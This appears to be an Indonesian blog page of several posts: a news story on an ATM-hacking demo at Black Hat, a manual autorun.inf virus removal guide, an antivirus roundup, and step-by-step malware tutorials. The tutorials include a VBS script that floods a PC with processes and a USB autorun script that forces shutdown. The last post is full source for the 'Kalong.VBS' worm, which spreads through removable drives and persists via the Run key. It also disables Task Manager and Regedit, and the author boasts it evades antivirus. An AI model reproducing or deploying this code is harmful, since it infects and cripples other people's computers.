Diberdayakan oleh Blogger.

Bobol ATM lewat via Internet

Seorang hacker telah menemukan sebuah cara untuk memaksa mesin-mesin ATM untuk memuntahkan uang yang ada di dalam perutnya, dengan cara membajak komputer yang ada di dalamnya.

Serangan yang didemonstrasikan pada hari Rabu kemarin ditargetkan pada ATM-ATM yang berdiri sendiri Tapi metode ini bisa juga diterapkan pada ATM-ATM yang dioperasikan oleh bank-bank mainstream.

Para penjahat sudah lama tahu bahwa ATM tidaklah antibobol.

Ada banyak jenis serangan yang digunakan saat ini, mulai dari yang canggih sampai yang tolol: menginstal pembaca kartu palsu untuk mencuri nomor kartu, menyembunyikan kamera pengintai kecil untuk menangkap kode PIN, menutupi slot pengeluaran uang untuk mencegat uang dan bahkan mengangkut ATM pergi dengan truk dengan harapan bisa membukanya nanti.

Hacker komputer Barnaby Jack menghabiskan waktu dua tahun bermain-main di apartemennya di Silicon Valley dengan mesin-mesin ATM yang dia beli secara online. Mesin-mesin ATM tersebut adalah jenis mesin ATM yang berdiri sendiri, jenis yang sering terlihat di depan toko-toko yang nyaman, bukan yang ada di kantor-kantor cabang bank.

Tujuannya adalah untuk menemukan cara-cara mengendalikan ATM dengan memanfaatkan kelemahan-kelemahan yang ada pada komputer-komputer yang menjalankan mesin tersebut.

Dia memamerkan hasil penelitiannya ini pada konferensi Black Hat, sebuah pertemuan tahunan yang bertujuan untuk mengekspos model-model kerentanan keamanan komputer yang paling baru.

Serangan Jack ini memiliki implikasi yang luas karena mampu mempengaruhi beberapa jenis mesin ATM dari jenis yang berbeda-beda dan dapat mengeksploitasi kelemahan-kelemahansoftware dan langkah-langkah keamanan yang digunakan di seluruh industri.

Apa yang dibicarakan Jack dalam konferensi tersebut adalah salah satu dari yang paling ditunggu-tunggu oleh para peserta, sebagaimana tema pembicaraannya yang menarik tahun lalu yang mengungkapkan bahwa perbaikan mesin ATM tidak bisa dilakukan di tempat segera setelah kejadian. 

Dia memanfaatkan waktu ekstra satu tahun untuk mereka-reka serangan yang lebih berbahaya lagi.
Jack, yang bekerja sebagai direktur riset keamanan pada IOActive Inc yang berbasis di Seattle, menunjukkan dua cara ia bisa mengorek uang dari mesin ATM, dalam sebuah demonstrasi yang teatrikal:

- Jack menemukan bahwa tombol fisik yang menyertai mesin-mesin ATM yang dibelinya adalah sama untuk semua jenis mesin ATM. Dia menemukan hal ini dengan memesan tiga mesin ATM dari produsen yang berbeda, masing-masing seharga beberapa ribu dolar. Lalu ia membandingkan kunci-kunci mesin ATM tersebut dengan gambar-gambar kunci lainnya, yang ditemukan di Internet.

Dia menggunakan kunci tersebut untuk membuka sebuah kompartemen di dalam ATM yang memiliki slot standar USB. Kemudian dia memasukkan sebuah program yang telah ia tulis ke dalam salah satu dari slot-slot tersebut, untuk memerintah ATM tersebut memuntahkan isinya.

– Jack juga menyusup ke dalam mesin-mesin ATM dengan cara memanfaatkan kelemahan para pembuat ATM dalam berkomunikasi dengan mesin-mesin tersebut melalui Internet. Jack mengatakan masalahnya adalah bahwa ada kemungkinan orang luar dapat menggunakan kartu ATM yang dia temukan meski tanpa menggunakan password. Dia tidak merinci lebih detil karena ia mengatakan tujuan pembicaraan itu “tidak untuk mengajarkan orang cara meng-hack ATM. Tujuan pembicaraan ini untuk mengangkat isu tersebut dan agar produsen pembuat mesin ATM proaktif dalam melakukan perbaikan” katanya.

Gaya serangan jarak jauh adalah lebih berbahaya karena penyerang tidak perlu membuka mesin ATM.
Serangan jarak jauh ini memungkinkan penyerang untuk mendapatkan kontrol penuh dari ATM.Selain memerintahkan mesin ATM untuk memuntahkan uang, penyerang bisa diam-diam memanen data account dari siapa saja yang menggunakan mesin tersebut. Serangan jarak jauh ini bisa mengenai lebih dari sekedar ATM berdiri sendiri yang rentan terhadap serangan fisik; metode serangan jarak jauh ini dapat digunakan terhadap jenis-jenis ATM yang digunakan oleh bank-bank mainstream.

Jack mengatakan ia tidak berpikir ia akan mampu menyusup ke mesin-mesin ATM saat ia pertama kali mulai melakukan penyelidikan.

“Reaksi saya ketika itu adalah, “ini adalah permainan-kerentanan,”" katanya mengenai serangan jarak jauh tersebut. “Tiap ATM yang saya sudah lihat, saya mampu menemukan kelemahannya.Ini merupakan hal yang menakutkan.”

Kurt Baumgartner, seorang peneliti keamanan senior dari perusahaan pembuat software antivirus Kaspersky Lab, menyebut demonstrasi itu sebagai sesuatu yang “mencekam” untuk dilihat dan dia mengatakan adalah penting untuk meningkatkan keamanan mesin-mesin tersebut yang masing-masing dapat menampung puluhan ribu dolar dalam bentuk tunai. Namun, ia mengatakan ia tidak berpikir akan terjadi serangan yang meluas karena bank tidak menggunakan sistem ATM berdiri sendiri dan Jack tidak merilis kode serangannya.

Jack tidak akan mengidentifikasi para pembuat mesin-mesin tersebut. Dia memasang stiker untuk menutupi nama pembuat ATM ‘pada dua mesin yang digunakan dalam demonstrasi itu. Tapi para penonton, yang meledak tepuk tangannya demi melihat ia berhasil membuat mesin-mesin tersebut memuntahkan uang, bisa melihat dari layar petunjuk di ATM bahwa salah satu mesin tersebut dibuat oleh Tranax Technologies Inc, berbasis di Hayward, California Tranax tidak segera merespon e-mail dari The Associated Press.

Triton System, dari Long Beach, Miss, membenarkan bahwa salah satu mesin ATM-nya digunakan dalam demonstrasi tersebut. Perusahaan itu mengatakan bahwa Jack telah mengingatkan perusahaan tersebut dalam hal keamanan dan Triton sekarang telah memiliki update software di tempat yang diperlukan guna mencegah perangkat lunak yang tidak sah beroperasi pada mesin-mesin ATM mereka.

Bob Douglas, Vice President Triton bidang engineering, mengatakan bahwa para pelanggan dapat membeli mesin ATM dengan tombol unik, namun umumnya mereka tidak melakukan itu, mereka lebih suka menggunakan kunci dasar karena alasan biaya dan kenyamanan.

“Bayangkan jika Anda memiliki sebuah estate yang terdiri dari beberapa ribu mesin ATM dan Anda ingin mengakses 20 atau lebih di antaranya dalam satu hari,” tulisnya dalam e-mail ke AP.“Ini akan menjadi mimpi buruk logistik untuk mengingat-ingat semua tombol yang tepat pada tempat yang tepat dan pada waktu yang tepat.

Produsen pembuat mesin ATM lainnya yang dihubungi oleh AP juga tidak segera merespon pesan-pesan yang disampaikan.

Jack mengatakan produsen mesin ATM yang produknya ia dipelajari sedang memasang perangkat lunak perbaikan untuk kedua jenis kerentanan tersebut, tetapi ia menambahkan bahwa prevalensi software manajemen jarak jauh secara luas menyebabkan ATM terbuka terhadap serangan hacker. (yahoo.com) (, On Wednesday July 28, 2010, 10:35 pm EDT)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cara Menghilangkan Virus Autorun.inf


Kasus ini menimpah seorang teman saya, ketika laptop yang baru dibeli sudah terinfeksi virus autorun.inf. Virus ini merusak hampir semua drive di dalam hard disk, Dalam beberapa kasus, ketika drive Anda terinfeksi virus autorun.inf, Anda tidak akan dapat mengakses drive sepenuhnya. Anda harus menelusuri drive dengan cara menekan Ctrl + E tombol dari keyboard.

Dalam postingan ini Saya akan menunjukkan kepada Anda metode menghapus virus autorun.inf secara manual hanya menggunakan aplikasi winrar, tidak ada antivirus atau program malware.

Solusi untuk menghapus Virus autorun.inf hanya dengan menggunakan Winrar.

Langkah 1: Pertama Nonaktifkan CD / DVD atau USB Autorun di windows

Langkah 2: buka program Winrar (Start-> All Program-WinRar.exe> WinRar->)

Langkah 3: Sekarang Browse untuk setiap drive yang terinfeksi virus autorun.inf menggunakan explorer winrar.
Langkah 4: Di sini Anda akan melihat semua file yang tersembunyi di bawah winrar untuk drive yang anda pilih

Langkah 5: Carilah file autorun.inf dan buka dengan menggunakan notepad.


Langkah 6: Pada file Autorun, ada beberapa file berextensi EXE. file berextensi exe inilah penyebab utama terbentuk virus.

Langkah 7: Catat file yang berextensi .exe yang disebutkan di file autorun.inf.

Langkah 8: Sekarang lihat file berextensi .exe tersebut berada di drive mana (contoh: c: /), Hapus file tersebut bersama dengan autorun.inf-nya

Langkah 9: Restart Sistem Operasi Anda. Sekarang sistem anda bebas dari Virus autorun.inf.

Catatan: Ulangi proses yang sama jika Usb atau drive yang lain terinfeksi virus autorun.inf.

Jika Anda tahu metode yang lain untuk menghapus virus autorun dari sistem operasi windows, silahkan beritahu saya dengan berkomentar di postingan ini.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tehnik Buat Virus dengan Notepad


Membuat virus dengan notepad.

Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

Let`s Begin!

langkah-langkah:

1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
3. Save notepad dengan nama virus.vbs

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Pasang Password di FD tanpa Sowftwere

Untuk mengunci flashdisk atau memberi password otomatis ke flashdisk Dengan Mudah Tanpa Software kita dapat menggunakan beberapa aplikasi yang mudah didapatkan.Tetapi beda lagi dengan postingan kali ini,

       Cara ini akan otomatis meminta password ketika flashdisk dimasukan ke PC dan jika password salah, maka akan terjadi shutdown komputer secara otomatis...

Langsung saja :
1. Buka Notepad
( Caranya : Start>>All Programs>>Accessories>>Notepad atau masuk di RUN lalu ketik notepad dan Enter) lalu copy paste script kode dibawah ini ke notepad

on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject("Wscript.shell")
set fs=createobject("Scripting.FileSystemObject")
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject("wscript.shell")
do while quest=""
quest=inputbox("Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!","http://pedasmaniscinta.blogspot.com")
if quest="" then
m=MsgBox("Maaf anda belum memasukkan password...!", 0+0+48, "http://pedasmaniscinta.blogspot.com")
end if
loop
if quest=
"TULIS PASSWORD DISINI" then
s.run "shutdown -a"
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
else
s.run "shutdown -s -t 0"
end if


TULIS PASSWORD DISINI ganti sesuai keinginan anda, itu adalah sebagai tempat password anda. Pemakaian huruf kapital sangat berpengaruh. saya sarankan memakai angka yang sudah diingat di luar kepala.
lalu save as dengan nama dengan "passwordlock.vbs" tanpa tanda kutip, sebelum di save as pastikan pilih all files.

2. setelah selesai diatas.
lalu buka Notepad lagi, untuk pengaturan otomatis setelah flashdisk dimasukan di PC.
copy paste script kode dibawah ini ke notepad
[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=FLASHDISK TELAH DILENGKAPI CODE


anda dapat merubah kata "FLASHDISK TELAH DILENGKAPI CODE" sesuai kata-kata mutiara keinginan anda sendiri.
setelah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah "autorun.inf" tanpa tanda kutip, sebelum di save as pastikan pilih all files.

Kemudian pindahkan kedua file yang telah anda buat tadi (autorun.inf dan passwordlock.vbs) ke dalam flashdisk anda.

langkah terakhir silahkan anda hidden autorun.inf dan passwordlock.vbs yang telah dibuat tadi.
Cara hidden : klik kanan pada masing- masing autorun.inf dan passwordlock.vbs lalu pilih properties centang kotak yang ada di tanda hidden. selesai . . . .

INFO :
- kompitabel dengan win XP.
- dimohon jangan sampai lupa password sendiri (Ninja black rock tidak bertanggung jawab atas kesalahan password sendiri)

jika masih kesulitan,
bisa tinggalkan komentar dibawah .
selamat mencoba.  
 

Posting berikutny Secret...  

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

5 antivirus terbaik di dunia

Tentu saja ini adalah harapan dari banyak pengguna internet untuk mendapatkan antivirus terbaik dan terkuat 2011 apalagi dengan gratis tanpa harus  download secara ilegal.Coba perhatikan review masing-masing dan bandingkan kelemahanya,tapi mereka tetap yang terbaik.Menggunakan semua antivirus gratisan tidak perlu takut kena blacklist.
Melakukan pengamanan PC tidak harus selalu membayar,tetapi memilih yang terbaik untuk melindungi PC dari virus adalah wajib.Sebuah virus komputer adalah sebuah program yang load sendiri ke komputer Anda tanpa sepengetahuan Anda. Tanpa perlindungan antivirus, virus akan menginfeksi komputer Anda.
Ingatlah untuk selalu melakukan update agara keamanan lebih terjaga.
Di sini, Anda akan melihat deskripsi rinci tentang program dan tools removal virus gratis sehingga Anda dapat menentukan software mana yang akan sesuai dengan kebutuhan anda.

avast-5 antivirus

Avast Free Antivirus

Avast Free Antivirus adalah  paket antivirus gratis terbaik 2011: Avast melakukan pekerjaan yang gemilang dengan  memblokir malware , memiliki antarmuka yang menyenangkan, dan memindai file dengan cepat.
Download Avast Free Antivirus di
http://www.avast.com/free-antivirus-download
avira_antivirus

Avira Personal Free AntiVirus 10

Avira AntiVirus Personal gratis terkuat bekerja dengan giat dengan blocking dan mendeteksi malware, tetapi antarmuka kurang familier.
Download Avira Antivirus Free di
http://www.avira.com/en/avira-free-antivirus
microsoft antivirus

Microsoft Security Essentials 1.0

Microsoft Security Essentials gratis terbaik mudah digunakan, tetapi masih tertinggal dari antivirus lain dalam mendeteksi virus malwaree .
Download Microsoft Security Essentials free di
http://www.microsoft.com/security_essentials/
panda antivirus

Panda Cloud Antivirus 1.0

Panda Antivirus Cloud gratis terbaik mudah digunakan, namun kecepatan scanning lebih lambat dari rata-rata. Perhatikan update Antivirus, Cloud 1.3 yang mana banyak yang mengharapkan peningkatan kemampuan blocking virusnya.
Download Panda Antivirus Cloud di
http://www.cloudantivirus.com/en/
comodo-internet-security

Comodo Internet Security Premium 5.0

Comodo Internet Security Premium gratis terkuat melakukan pekerjaan yang baik di memblokir malware baru dan memiliki firewall, namun performa deteksi tidak konsisten secara keseluruhan membuatnya sulit kurang laris.
Download Co

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Buat Virus Sederhana dari Notepad

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian 
lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <
> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run,  dan memblokir Regedit 
dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, 
don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–/
/
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS